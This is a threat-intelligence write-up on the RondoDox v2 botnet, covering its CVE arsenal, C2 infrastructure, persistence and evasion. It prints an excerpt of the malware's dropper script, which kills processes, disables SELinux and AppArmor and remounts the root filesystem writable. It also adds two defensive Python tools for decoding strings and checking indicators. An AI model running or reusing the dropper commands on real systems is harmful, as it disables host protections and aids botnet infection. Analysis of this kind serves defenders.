A sophisticated evolution of the RondoDox botnet has emerged with a staggering 650% increase in exploitation capabilities, marking a significant escalation in the threat landscape for both enterprise and IoT infrastructure.
First documented by FortiGuard Labs in September 2024, the original RondoDox variant focused narrowly on DVR systems with just two exploit vectors.
The newly discovered RondoDox v2, however, demonstrates a dramatic expansion with over 75 distinct exploitation vectors targeting everything from legacy routers to modern enterprise applications.
This evolution represents a fundamental shift in botnet development strategy, bridging the gap between opportunistic IoT exploitation and targeted enterprise compromise.
The malware was detected on October 30, 2025, through honeypot telemetry when research infrastructure began receiving automated exploitation attempts from IP address 124.198.131.83 originating from New Zealand.
The attack pattern immediately distinguished itself through its volume and sophistication, deploying 75 distinct exploit payloads in rapid succession.
Each payload attempted command injection vectors targeting router and IoT vulnerabilities, with all payloads downloading malicious scripts from the command-and-control server at 74.194.191.52.
Unusually, the threat actor embedded an open attribution signature ([email protected]) directly into User-Agent strings, marking a departure from the anonymous operational security typically employed by botnet operators.
Beelzebub analysts identified the malware through their AI-native deception platform, which captured the complete attack chain and enabled comprehensive technical analysis of the botnet’s capabilities.
RondoDox v2 targets an extensive range of vulnerable devices spanning multiple vendor ecosystems and more than a decade of CVE history.
The exploit arsenal includes critical vulnerabilities such as CVE-2014-6271 (Shellshock), CVE-2018-10561 (Dasan GPON routers), CVE-2021-41773 (Apache HTTP Server), and CVE-2024-3721 (TBK DVR systems).
The malware demonstrates cross-platform flexibility by deploying 16 architecture-specific binaries including x86_64, multiple ARM variants, MIPS, PowerPC, and even legacy architectures like m68k and SPARC.
This comprehensive architecture support ensures maximum infection potential across diverse embedded systems and enterprise servers.
The command-and-control infrastructure operates on compromised residential IP addresses distributed across multiple ASNs, providing resilience and evasion capabilities that make traditional blocking strategies less effective.
Technical Infrastructure and Obfuscation Mechanisms
The dropper script employed by RondoDox v2 showcases sophisticated evasion and persistence techniques designed to bypass security controls and eliminate competing malware.
Upon execution, the script immediately disables SELinux and AppArmor security frameworks using commands such as setenforce 0 and service apparmor stop, creating an environment conducive to malicious activity.
The script then proceeds with aggressive competitor elimination, systematically killing processes associated with cryptocurrency miners like xmrig and other known botnet families including redtail.
This behavior ensures resource monopolization on infected systems while reducing detection probability by eliminating noisy competing malware.
The binary payload itself employs XOR-based string obfuscation with a key value of 0x21 to conceal critical configuration data from static analysis tools.
Decoded strings reveal command-and-control protocol implementations including “handshake” for C2 initialization and “udpraw” indicating DDoS capabilities.
The malware demonstrates anti-analysis awareness by checking for exit code 137, which indicates SIGKILL termination commonly employed by automated sandbox environments.
Detection of this condition causes immediate script termination, effectively evading many automated malware analysis systems.
```sh
#!/bin/sh
# [email protected]
exec > /dev/null 2>&1   # silence all output from the script
[ -t 0 ] && exit 0      # bail out if stdin is a terminal, i.e. when run interactively by an analyst
# kill every process whose /proc/<pid>/exe link no longer resolves, i.e. whose binary was deleted from disk
for p in /proc/[0-9]*; do pid=${p##*/}; [ ! -e "$p/exe" ] && kill -9 $pid 2>/dev/null; done
setenforce 0            # switch SELinux to permissive mode
service apparmor stop   # stop AppArmor
mount -o remount,rw /||sudo mount -o remount,rw /   # make the root filesystem writable
```
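The XOR-0x21 string obfuscation described above can be undone during triage without a debugger. The following is an added example, not code from the report or from the analysts, that scans a blob for runs which become printable only after XOR with 0x21; the sample bytes and the lowercase heuristic are constructed for illustration.

```python
import re
import sys
from typing import List, Tuple

XOR_KEY = 0x21   # single-byte key the report attributes to RondoDox v2
MIN_LEN = 5      # shortest decoded run worth reporting

def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """XOR every byte with a one-byte key; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)

def looks_like_text(s: str) -> bool:
    """Heuristic (assumption): real config strings are mostly lowercase, digits or
    path characters; plaintext already in the binary decodes to uppercase/symbol junk."""
    good = sum(c.islower() or c.isdigit() or c in "./:-_" for c in s)
    return good * 2 > len(s)

def extract_xor_strings(blob: bytes, key: int = XOR_KEY,
                        min_len: int = MIN_LEN) -> List[Tuple[int, str]]:
    """Return (offset, string) for printable runs found after XOR-decoding blob."""
    decoded = xor_bytes(blob, key)
    runs = re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, decoded)
    return [(m.start(), m.group().decode("ascii"))
            for m in runs if looks_like_text(m.group().decode("ascii"))]

# Constructed sample: an ELF-like header, a plaintext loader path, and an
# XOR-0x21 string table holding the two C2 verbs named in the report.
SAMPLE_BLOB = (b"\x7fELF" + b"\x21\x21" + b"/lib/ld-musl" + b"\x21\x21"
               + xor_bytes(b"handshake\x00udpraw\x00") + b"\x21\xff\xfe")

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for off, s in extract_xor_strings(data):
        print(f"0x{off:08x}  {s}")
```

Run it against a suspected sample path to list decoded strings with their file offsets; the raw loader path in the sample is deliberately not reported because it decodes to junk.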
Persistence mechanisms leverage cron-based scheduling with @reboot directives, ensuring automatic execution following system restarts.
The malware attempts installation across multiple filesystem locations including /tmp/lib/rondo, /dev/shm/lib/rondo, and /var/tmp/lib/rondo, demonstrating awareness of different system configurations and permission structures.
Network communication occurs over TCP port 345 using a custom binary protocol that initiates with a “handshake” message to the primary C2 server at 74.194.191.52.
The malware spoofs User-Agent strings to appear as legitimate iPhone iOS 18.5 devices, further obscuring malicious traffic within enterprise environments.
DDoS capabilities include HTTP flood attacks mimicking gaming traffic, UDP raw socket operations, TCP SYN flooding, and protocol mimicry for OpenVPN, WireGuard, and popular gaming platforms including Minecraft, Fortnite, and Discord.
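The persistence paths, @reboot cron entries and the TCP port 345 C2 channel described above can be checked from collected host artefacts. The following is an added example, not code from the report or its authors: it takes a crontab dump, a list of existing paths and the text of /proc/net/tcp and returns the matching indicators. The sample inputs are constructed, and the binary name "start" under the rondo directory is an assumption.

```python
import socket
import struct
from typing import Iterable, List

RONDO_PATHS = ("/tmp/lib/rondo", "/dev/shm/lib/rondo", "/var/tmp/lib/rondo")  # from the report
C2_PORT = 345  # TCP port of the custom C2 protocol, from the report

def find_rondo_cron_entries(crontab_text: str) -> List[str]:
    """Crontab lines that fire at @reboot and reference a known rondo install path."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line.startswith("@reboot") and any(p in line for p in RONDO_PATHS):
            hits.append(line)
    return hits

def find_rondo_paths(existing_paths: Iterable[str]) -> List[str]:
    """Which of the known install directories are present on the host."""
    present = set(existing_paths)
    return [p for p in RONDO_PATHS if p in present]

def _decode_addr(field: str) -> str:
    """Convert a /proc/net/tcp 'HHHHHHHH:PPPP' field to 'a.b.c.d:port'.
    The kernel prints the IPv4 address in host byte order (little-endian on x86/ARM)."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return f"{ip}:{int(port_hex, 16)}"

def find_c2_connections(proc_net_tcp: str, port: int = C2_PORT) -> List[str]:
    """Remote endpoints of ESTABLISHED (state 01) sockets whose remote port matches."""
    found = []
    for line in proc_net_tcp.splitlines()[1:]:   # first line is the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        remote, state = fields[2], fields[3]
        if state == "01" and int(remote.split(":")[1], 16) == port:
            found.append(_decode_addr(remote))
    return found

# Constructed samples (not captured from a real host); "start" is an assumed file name
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew
@reboot /dev/shm/lib/rondo/start >/dev/null 2>&1
"""
SAMPLE_PATHS = ["/tmp", "/dev/shm", "/dev/shm/lib/rondo", "/var/tmp"]
SAMPLE_PROC_NET_TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:B5C2 34BFC24A:0159 01 00000000:00000000 00:00000000 00000000  1000        0 5678 1 0000000000000000 20 4 30 10 -1
"""
```

On a live host, feed it `crontab -l` output for each user, the result of an `os.path.isdir` sweep and the contents of /proc/net/tcp; the sample connection row decodes to the C2 address named in the report.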